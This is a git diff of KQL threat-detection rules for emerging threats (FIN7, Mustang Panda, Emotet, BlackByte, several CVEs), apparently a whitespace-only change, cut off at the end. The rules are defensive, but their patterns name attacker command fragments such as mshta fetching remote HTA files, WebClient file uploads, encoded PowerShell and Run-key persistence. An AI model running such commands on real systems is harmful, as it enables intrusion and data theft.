b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-04 -// Level: high -// Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution -// MITRE Tactic: Execution -// Tags: attack.execution, attack.g0046, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution +// MITRE Tactic: Execution +// Tags: attack.execution, attack.g0046, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "-noni -nop -exe bypass -f \\\\" and ProcessCommandLine contains "ADMIN$") or (ProcessCommandLine contains "-ex bypass -noprof -nolog -nonint -f" and ProcessCommandLine contains "C:\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql index 8f993f71..0c7fb559 100644 --- a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql +++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql @@ -1,10 +1,10 @@ -// Title: Potential APT FIN7 Related PowerShell Script Created -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-04 -// Level: high -// Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts -// MITRE Tactic: Execution -// Tags: attack.execution, attack.g0046, detection.emerging-threats - -DeviceFileEvents +// Title: Potential APT FIN7 Related PowerShell Script Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: high +// Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.g0046, detection.emerging-threats + +DeviceFileEvents | where FolderPath in~ ("host_ip.ps1") or FolderPath endswith "_64refl.ps1" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql b/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql index dfb1022a..82f54647 100644 --- a/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql +++ b/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql @@ -1,12 +1,12 @@ -// Title: Potential APT Mustang Panda Activity Against Australian Gov -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: high -// Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.g0129, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential APT Mustang Panda Activity Against Australian Gov +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.g0129, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "copy SolidPDFCreator.dll" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\SolidPDFCreator.dll") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "SolidPDF" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql index caff29fc..9b01ee53 100644 --- a/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql @@ -1,10 +1,10 @@ -// Title: Potential Baby Shark Malware Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2019-02-24 -// Level: high -// Description: Detects activity that could be related to Baby Shark malware -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.discovery, attack.t1012, attack.t1059.003, attack.t1059.001, attack.t1218.005, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Baby Shark Malware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-24 +// Level: high +// Description: Detects activity that could be related to Baby Shark malware +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.discovery, attack.t1012, attack.t1059.003, attack.t1059.001, attack.t1218.005, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "powershell.exe mshta.exe http" and ProcessCommandLine contains ".hta") or (ProcessCommandLine contains "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"" or ProcessCommandLine contains "cmd.exe /c taskkill /im cmd.exe" or ProcessCommandLine contains "(New-Object System.Net.WebClient).UploadFile('http") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql index 30c060eb..6d1167ef 100644 --- a/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql @@ -1,10 +1,10 @@ -// Title: Potential BlackByte Ransomware Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-25 -// Level: high -// Description: Detects command line patterns used by BlackByte ransomware in different operations -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.impact, attack.t1485, attack.t1498, attack.t1059.001, attack.t1140, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential BlackByte Ransomware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: Detects command line patterns used by BlackByte ransomware in different operations +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.impact, attack.t1485, attack.t1498, attack.t1059.001, attack.t1140, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains " -single " and FolderPath startswith "C:\\Users\\Public\\") or (ProcessCommandLine contains "del C:\\Windows\\System32\\Taskmgr.exe" or ProcessCommandLine contains ";Set-Service -StartupType Disabled $" or ProcessCommandLine contains "powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(" or ProcessCommandLine contains " do start wordpad.exe /p ") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql index 292bd035..fa15c274 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql @@ -1,10 +1,10 @@ -// Title: Potential CVE-2021-26857 Exploitation Attempt -// Author: Bhabesh Raj -// Date: 2021-03-03 -// Level: high -// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service -// MITRE Tactic: Execution -// Tags: attack.t1203, attack.execution, cve.2021-26857, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential CVE-2021-26857 Exploitation Attempt +// Author: Bhabesh Raj +// Date: 2021-03-03 +// Level: high +// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service +// MITRE Tactic: Execution +// Tags: attack.t1203, attack.execution, cve.2021-26857, detection.emerging-threats + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" and (not((FolderPath endswith "wermgr.exe" or FolderPath endswith "WerFault.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql index dff1e1b2..a6b66193 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql @@ -1,10 +1,10 @@ -// Title: Potential CVE-2021-40444 Exploitation Attempt -// Author: Florian Roth (Nextron Systems), @neonprimetime -// Date: 2021-09-08 -// Level: high -// Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, cve.2021-40444, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential CVE-2021-40444 Exploitation Attempt +// Author: Florian Roth (Nextron Systems), @neonprimetime +// Date: 2021-09-08 +// Level: high +// Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, cve.2021-40444, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath endswith "\\control.exe" and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) and (not((ProcessCommandLine endswith "\\control.exe input.dll" or ProcessCommandLine endswith "\\control.exe\" input.dll"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql index 4d683ad4..6f8a15bb 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql @@ -1,13 +1,13 @@ -// Title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution -// Author: @kostastsale -// Date: 2022-04-25 -// Level: medium -// Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. -// As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats -// False Positives: -// - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process. - -DeviceProcessEvents +// Title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution +// Author: @kostastsale +// Date: 2022-04-25 +// Level: medium +// Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. +// As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats +// False Positives: +// - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\prunsrv.exe" and ((ProcessCommandLine contains "/c powershell" and FolderPath endswith "\\cmd.exe") or FolderPath endswith "\\powershell.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql index a3e6f1d8..cd3ae4cf 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql @@ -1,12 +1,12 @@ -// Title: Potential CVE-2022-29072 Exploitation Attempt -// Author: frack113, @kostastsale -// Date: 2022-04-17 -// Level: high -// Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. -// 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. -// The command runs in a child process under the 7zFM.exe process. -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2022-29072, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential CVE-2022-29072 Exploitation Attempt +// Author: frack113, @kostastsale +// Date: 2022-04-17 +// Level: high +// Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. +// 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. +// The command runs in a child process under the 7zFM.exe process. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2022-29072, detection.emerging-threats + +DeviceProcessEvents | where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\7zFM.exe") and (not((((ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r ") or (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".cmd" or ProcessCommandLine endswith ".ps1")) or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql index 892d98cf..7b2ce655 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql @@ -1,10 +1,10 @@ -// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-23 -// Level: high -// Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2023-36874, detection.emerging-threats - -DeviceFileEvents +// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-23 +// Level: high +// Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-36874, detection.emerging-threats + +DeviceFileEvents | where FolderPath endswith "\\wermgr.exe" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\$WinREAgent\\" or FolderPath contains ":\\Windows\\servicing\\LCU\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\" or FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql index 901f562f..e3ec872b 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-23 -// Level: high -// Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874 -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2023-36874, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-23 +// Level: high +// Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874 +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-36874, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\wermgr.exe" and (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "powershell_ise.EXE", "powershell.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql index fb1edcad..18e47b3f 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql @@ -1,10 +1,10 @@ -// Title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-23 -// Level: medium -// Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874. -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2023-36874, detection.emerging-threats - -DeviceFileEvents +// Title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-23 +// Level: medium +// Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2023-36874, detection.emerging-threats + +DeviceFileEvents | where (FolderPath contains ":\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\" and FolderPath endswith "\\Report.wer") and (not((FolderPath contains "\\ReportArchive\\AppCrash_" or FolderPath contains "\\ReportArchive\\AppHang_" or FolderPath contains "\\ReportArchive\\Critical_" or FolderPath contains "\\ReportArchive\\Kernel_" or FolderPath contains "\\ReportArchive\\NonCritical_"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql index 75b24ef8..a8824448 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql @@ -1,13 +1,13 @@ -// Title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation -// Author: Andreas Braathen (mnemonic.io) -// Date: 2024-04-25 -// Level: medium -// Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. -// As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function. -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2024-3400, detection.emerging-threats -// False Positives: -// - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely. - -DeviceFileEvents +// Title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-04-25 +// Level: medium +// Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. +// As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2024-3400, detection.emerging-threats +// False Positives: +// - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely. + +DeviceFileEvents | where (FolderPath contains "{IFS}" or FolderPath contains "base64" or FolderPath contains "bash" or FolderPath contains "curl" or FolderPath contains "http") and FolderPath startswith "/opt/panlogs/tmp/device_telemetry/" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql b/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql index d029b8b8..b23c06eb 100644 --- a/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential Emotet Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2019-09-30 -// Level: high -// Description: Detects all Emotet like process executions that are not covered by the more generic rules -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Emotet Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-09-30 +// Level: high +// Description: Detects all Emotet like process executions that are not covered by the more generic rules +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or ProcessCommandLine contains "JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ" or ProcessCommandLine contains "QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA" or ProcessCommandLine contains "kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA" or ProcessCommandLine contains "IgAoACcAKgAnACkAOwAkA" or ProcessCommandLine contains "IAKAAnACoAJwApADsAJA" or ProcessCommandLine contains "iACgAJwAqACcAKQA7ACQA" or ProcessCommandLine contains "JABGAGwAeAByAGgAYwBmAGQ" or ProcessCommandLine contains "PQAkAGUAbgB2ADoAdABlAG0AcAArACgA" or ProcessCommandLine contains "0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA" or ProcessCommandLine contains "9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA") and (not((ProcessCommandLine contains "fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ" or ProcessCommandLine contains "wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA" or ProcessCommandLine contains "8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql index 83716e84..a1bc3e71 100644 --- a/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql +++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql @@ -1,10 +1,10 @@ -// Title: Potential Exploitation Attempt From Office Application -// Author: Christian Burkard (Nextron Systems), @SBousseaden (idea) -// Date: 2022-06-02 -// Level: high -// Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, cve.2021-40444, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Exploitation Attempt From Office Application +// Author: Christian Burkard (Nextron Systems), @SBousseaden (idea) +// Date: 2022-06-02 +// Level: high +// Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, cve.2021-40444, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "../../../.." or ProcessCommandLine contains "..\\..\\..\\.." or ProcessCommandLine contains "..//..//..//..") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql index a54eeafb..0336753c 100644 --- a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql +++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql @@ -1,12 +1,12 @@ -// Title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process -// Author: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke -// Date: 2024-04-01 -// Level: high -// Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094. -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2024-3094, detection.emerging-threats -// False Positives: -// - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with "sh -c" or "bash -c" - -DeviceProcessEvents +// Title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process +// Author: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke +// Date: 2024-04-01 +// Level: high +// Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2024-3094, detection.emerging-threats +// False Positives: +// - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with "sh -c" or "bash -c" + +DeviceProcessEvents | where (ProcessCommandLine startswith "bash -c" or ProcessCommandLine startswith "sh -c") and InitiatingProcessFolderPath endswith "/sshd" and AccountName =~ "root" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql index e78bde86..de7a844d 100644 --- a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql +++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql @@ -1,12 +1,12 @@ -// Title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group -// Author: frack113 -// Date: 2024-07-29 -// Level: high -// Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins". -// This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. -// VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. -// MITRE Tactic: Execution -// Tags: attack.execution, cve.2024-37085, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group +// Author: frack113 +// Date: 2024-07-29 +// Level: high +// Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins". +// This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. +// VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2024-37085, detection.emerging-threats + +DeviceProcessEvents | where ((ProcessCommandLine contains "/add" and ProcessCommandLine contains "/domain" and ProcessCommandLine contains "ESX Admins" and ProcessCommandLine contains "group") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) or ((ProcessCommandLine contains "New-ADGroup" and ProcessCommandLine contains "ESX Admins") and ((FolderPath endswith "\\PowerShell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.exe", "pwsh.dll")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql b/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql index 38ce5982..afea09da 100644 --- 